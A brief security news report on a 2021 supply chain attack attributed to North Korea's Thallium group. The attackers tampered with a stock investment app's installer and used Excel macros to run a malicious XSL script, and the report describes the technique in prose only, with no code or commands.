Security News > 2021 > January > North Korean software supply chain attack targets stock investors
North Korean hacking group Thallium has targeted users of a private stock investment messenger service in a software supply chain attack, according to a report published this week.
Attackers alter the installer of a stock investment app.
Within the legitimate installer of the stock investment platform, attackers injected specific commands that fetched a malicious XSL script from a rogue FTP server, and executed it on Windows systems via the in-built wmic.
Excel macros also used to deliver the payload. ESTsecurity researchers also observed Microsoft Office documents, such as Excel spreadsheets which contained macros were distributing the aforementioned XSL script payload. "ESRC is paying attention to the fact that the Thallium organization is using the 'XSL Script Processing' technique not only in spear phishing attacks based on malicious documents, but also for niche attacks including supply chain attacks," stated ESTsecurity researchers in their translated report.
Whether the goal behind this attack was monetary gain or espionage on traders, supply chain attacks have become a common nuisance of these times.
Last month, attackers targeted the open-source ecosystem RubyGems in a software supply chain attack to steal cryptocurrency from infected machines.